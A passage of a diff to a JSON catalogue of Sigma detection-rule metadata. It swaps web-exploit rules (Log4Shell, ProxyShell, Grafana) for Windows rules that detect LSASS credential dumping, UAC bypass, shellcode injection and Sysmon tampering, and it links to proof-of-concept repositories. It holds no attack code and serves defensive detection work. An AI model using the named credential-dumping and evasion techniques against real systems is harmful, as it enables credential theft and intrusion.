"web_cve_2021_40539_adselfservice.yml", + "filename": "proc_access_win_svchost_cred_dump.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" - ], - "tags": "No established tags" - }, - "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", - "value": "ADSelfService Exploitation" - }, - { - "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", - "meta": { - "author": "Sittikorn S, Nuttakorn Tungpoonsup", - "creation_date": "2021/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", - "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.t1548" ] }, - "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", - "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump" }, { - "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "meta": { - "author": "daffainfo, Florian Roth", - "creation_date": "2021/10/05", + "author": "Christian Burkard", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", - "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", - "https://twitter.com/ptswarm/status/1445376079548624899", - "https://twitter.com/h4x0r_dz/status/1445401960371429381", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/bl4sty/status/1445462677824761878", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ] }, - "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", - "value": "CVE-2021-41773 Exploitation Attempt" + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack" }, { - "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Samir Bousseaden, Michael Haag", + "creation_date": "2019/04/03", + "falsepositive": [ + "False positives are present when looking for 0x1410. Exclusions may be required." + ], + "filename": "proc_access_win_lsass_memdump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump" + }, + { + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "meta": { + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", + "creation_date": "2017/02/16", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; please add more filters" + ], + "filename": "proc_access_win_cred_dump_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" + ] + }, + "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "value": "Credential Dumping Tools Accessing LSASS Memory" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", "meta": { "author": "Florian Roth", - "creation_date": "2021/11/17", + "creation_date": "2022/03/13", "falsepositive": [ - "Vulnerability Scanning" + "Legitimate software accessing LSASS process for legitimate reason" ], - "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://blog.assetnote.io/2021/11/02/sitecore-rce/", - "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", - "value": "Sitecore Pre-Auth RCE CVE-2021-42237" - }, - { - "description": "Detects a successful Grafana path traversal exploitation", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/08", - "falsepositive": [ - "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" - ], - "filename": "web_cve_2021_43798_grafana.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", - "https://github.com/search?q=CVE-2021-43798", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", - "value": "Grafana Path Traversal Exploitation CVE-2021-43798" - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/10", - "falsepositive": [ - "Vulnerability scanning" - ], - "filename": "web_cve_2021_44228_log4j.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", - "value": "Log4j RCE CVE-2021-44228 Generic" - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/10", - "falsepositive": [ - "Vulnerability scanning" - ], - "filename": "web_cve_2021_44228_log4j_fields.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", - "value": "Log4j RCE CVE-2021-44228 in Fields" - }, - { - "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2022_27925_exploit.yml", + "filename": "proc_access_win_rare_proc_access_lsass.yml", "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", - "https://www.yang99.top/index.php/archives/82/", - "https://github.com/vnhacker1337/CVE-2022-27925-PoC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.27925" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", - "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on LSASS Access" }, { - "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Vulnerability scanners" - ], - "filename": "web_cve_2022_31656_auth_bypass.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", - "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" - }, - { - "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Vulnerability scanners", - "Legitimate access to the URI" - ], - "filename": "web_cve_2022_31659_vmware_rce.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", - "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/19", - "falsepositive": [ - "Web vulnerability scanners" - ], - "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ] - }, - "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", - "value": "Apache Spark Shell Command Injection - Weblogs" - }, - { - "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Web vulnerability scanners" - ], - "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", - "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", - "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", - "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.36804" - ] - }, - "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", - "value": "Atlassian Bitbucket Command Injection Via Archive API" - }, - { - "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "description": "Detects process access to LSASS memory with suspicious access flags", "meta": { "author": "Florian Roth", - "creation_date": "2021/03/03", + "creation_date": "2021/11/22", "falsepositive": [ - "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + "Legitimate software accessing LSASS process for legitimate reason" ], - "filename": "web_exchange_exploitation_hafnium.yml", + "filename": "proc_access_win_susp_proc_access_lsass.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", - "value": "Exchange Exploitation Used by HAFNIUM" + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access" }, { - "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", "meta": { - "author": "Florian Roth, Rich Warren", - "creation_date": "2021/08/07", + "author": "Christian Burkard, Tim Shelton", + "creation_date": "2021/07/28", "falsepositive": [ "Unknown" ], - "filename": "web_exchange_proxyshell.yml", + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1106" ] }, - "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", - "value": "Exchange ProxyShell Pattern" + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess" }, { - "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", "meta": { - "author": "Florian Roth, Rich Warren", + "author": "Bhabesh Raj", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_shellcode_inject_msf_empire.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_shellcode_inject_msf_empire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "value": "Potential Shellcode Injection" + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "meta": { + "author": "Christian Burkard", "creation_date": "2021/08/09", "falsepositive": [ "Unknown" ], - "filename": "web_exchange_proxyshell_successful.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + "https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" ], "tags": [ - "attack.initial_access" + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" ] }, - "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", - "value": "Successful Exchange ProxyShell Attack" + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection" }, { - "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "meta": { - "author": "frack113", - "creation_date": "2021/10/06", + "author": "Bhabesh Raj (rule), @thefLinkk", + "creation_date": "2022/06/27", "falsepositive": [ "Unknown" ], - "filename": "web_iis_tilt_shortname_scan.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://www.exploit-db.com/exploits/19525", - "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", - "value": "Successful IIS Shortname Fuzzing Scan" - }, - { - "description": "Detects possible Java payloads in web access logs", - "meta": { - "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Legitimate apps" - ], - "filename": "web_java_payload_in_access_logs.yml", + "filename": "proc_access_win_handlekatz_lsass_access.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" ], "tags": [ - "cve.2022.26134", - "cve.2021.26084" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" ] }, - "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", - "value": "Java Payload Strings" + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS Handle" }, { - "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", "meta": { "author": "Florian Roth", - "creation_date": "2021/12/12", + "creation_date": "2022/02/10", "falsepositive": [ - "Legitimate apps the use these paths" + "Rare programs that contain the word dump in their name and access lsass" ], - "filename": "web_jndi_exploit.yml", + "filename": "proc_access_win_lsass_memdump_indicators.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://github.com/pimps/JNDI-Exploit-Kit", - "https://githubmemory.com/repo/FunctFan/JNDIExploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] }, - "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", - "value": "JNDIExploit Pattern" + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump" }, { - "description": "Detects possible exploitation activity or bugs in a web application", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_hack_sysmonente.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/codewhitesec/SysmonEnte/", + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage" + }, + { + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/boku7/spawn", + "https://github.com/boku7/injectAmsiBypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", + "value": "CobaltStrike BOF Injection Pattern" + }, + { + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "meta": { + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "creation_date": "2022/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_susp_seclogon.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "value": "Suspicious LSASS Access Via MalSecLogon" + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "sysmon_file_block_exe.yml", + "level": "high", + "logsource.category": "file_block", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable" + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change" + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "creation_date": "2022/01/25", + "falsepositive": [ + "There are no known false positives at this time" + ], + "filename": "sysmon_process_hollowing.yml", + "level": "high", + "logsource.category": "process_tampering", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ] + }, + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection" + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": 